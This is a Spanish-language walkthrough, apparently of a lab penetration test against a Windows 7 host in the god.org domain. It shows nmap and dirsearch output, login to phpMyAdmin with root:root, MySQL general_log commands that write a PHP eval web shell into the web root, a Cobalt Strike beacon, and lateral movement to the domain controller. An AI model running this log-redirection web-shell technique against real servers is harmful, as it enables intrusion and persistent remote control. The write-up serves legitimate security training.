Escaneo de Puertos Abiertos con Nmap
┌──(root㉿kali)-[~]
└─# nmap -sT -sC -sV 10.10.0.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 08:28 CST
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 21.50% done; ETC: 08:28 (0:00:15 remaining)
Stats: 0:01:15 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.56% done; ETC: 08:29 (0:00:00 remaining)
Nmap scan report for 10.10.0.101
Host is up (0.069s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open tcpwrapped
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
110/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: GOD)
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1028/tcp open msrpc Microsoft Windows RPC
1049/tcp open msrpc Microsoft Windows RPC
1050/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql MySQL (unauthorized)
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-03-20T00:25:55
|_ start_date: 2024-05-05T12:37:51
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:7c:f0:68 (VMware)
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: stu1
| NetBIOS computer name: STU1\x00
| Domain name: god.org
| Forest name: god.org
| FQDN: stu1.god.org
|_ System time: 2025-03-20T08:25:55+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -2h43m24s, deviation: 4h37m07s, median: -3m25s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.96 seconds
</unknown>
Recolección de Información del Puerto 80
Al acceder al sitio web, se identifica la ruta absoluta y se realiza un escaneo de directorios:
┌──(root㉿kali)-[~]
└─# dirsearch -u http://10.10.0.101/ -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz
HTTP method: GET | Threads: 25 | Wordlist size: 14594
Output File: /root/reports/http_10.10.0.101/__25-03-20_08-38-57.txt
Target: http://10.10.0.101/
[08:38:57] Starting:
[08:39:02] 403 - 211B - /%3f/
[08:39:02] 403 - 215B - /%C0%AE%C0%AE%C0%AF
[08:39:02] 403 - 210B - /%ff
[08:39:04] 403 - 220B - /.ht_wsr.txt
[08:39:04] 403 - 223B - /.htaccess.bak1
[08:39:04] 403 - 223B - /.htaccess.orig
[08:39:04] 403 - 225B - /.htaccess.sample
[08:39:04] 403 - 223B - /.htaccess.save
[08:39:04] 403 - 223B - /.htaccess_orig
[08:39:04] 403 - 224B - /.htaccess_extra
[08:39:04] 403 - 221B - /.html
[08:39:04] 403 - 213B - /.htm
[08:39:04] 403 - 223B - /.htpasswd_test
[08:39:04] 403 - 219B - /.htpasswds
[08:39:04] 403 - 220B - /.httr-oauth
[08:39:32] 403 - 225B - /index.php::$DATA
[08:39:40] 301 - 238B - /phpMyAdmin -> http://10.10.0.101/phpMyAdmin/
[08:39:40] 301 - 238B - /phpmyadmin -> http://10.10.0.101/phpmyadmin/
[08:39:40] 200 - 71KB - /phpinfo.php
[08:39:41] 200 - 2KB - /phpmyadmin/README
[08:39:41] 200 - 32KB - /phpmyadmin/ChangeLog
[08:39:41] 200 - 4KB - /phpmyadmin/index.php
[08:39:41] 200 - 4KB - /phpMyAdmin/index.php
[08:39:41] 200 - 4KB - /phpmyAdmin/
[08:39:41] 200 - 4KB - /phpMyAdmin/
[08:39:41] 200 - 4KB - /phpmyadmin/
[08:39:41] 200 - 4KB - /phpMyadmin/
[08:39:50] 403 - 225B - /Trace.axd::$DATA
[08:39:53] 403 - 226B - /web.config::$DATA
El escaneo revela la existencia del directorio phpMyAdmin y un archivo phpinfo.php.
Explotación de Vulnerabilidades
Acceso al Panel phpMyAdmin con Credenciales Débiles
Al acceder a phpMyAdmin, se puede intentar un ataque de fuerza bruta. Las credenciales débiles "root:root" permiten el acceso al sistema. Además, se puede obtener la ruta absoluta del sitio desde la página del phpinfo.
Obtención de Shell
Se modifica la ruta del archivo de registro para obtener una shell:
show variables like '%general%';
Se activa el regitsro:
set global general_log = on;
Se modifica la ruta del archivo de registro:
set global general_log_file="C:/phpStudy/WWW/shell.php"
Se ejecuta código PHP maliccioso:
select "<?php eval($_POST[1]); php??>";
Se utiliza AntSword para conectarse y obtener una webshell.
Establecimiento de Beacon con Cobalt Strike
Se genera un payload y se sube al servidor. Al ejecutarse, se establece comunicación con Cobalt Strike. Se modifica el intervalo de reconexión a 1 segundo para obtener acceso interactivo.
Reconocimiento en la Red Interna
Información del Dominio
Se identifica el dominio al que pertenece la máquina y se intentan obtener contraseñas almacenadas.
Escaneo de Hosts en el Dominio
Se realiza un escaneo de la red interna para identificar otros hosts. Se encuentra el controlador de dominio en la dirección 192.168.52.138.
Movilidad Lateral hacia el Controlador de Dominio
Se establece un listener SMB y se logra obtener acceso al controlador de dominio a través de la explotación de vulnerabilidades existentes.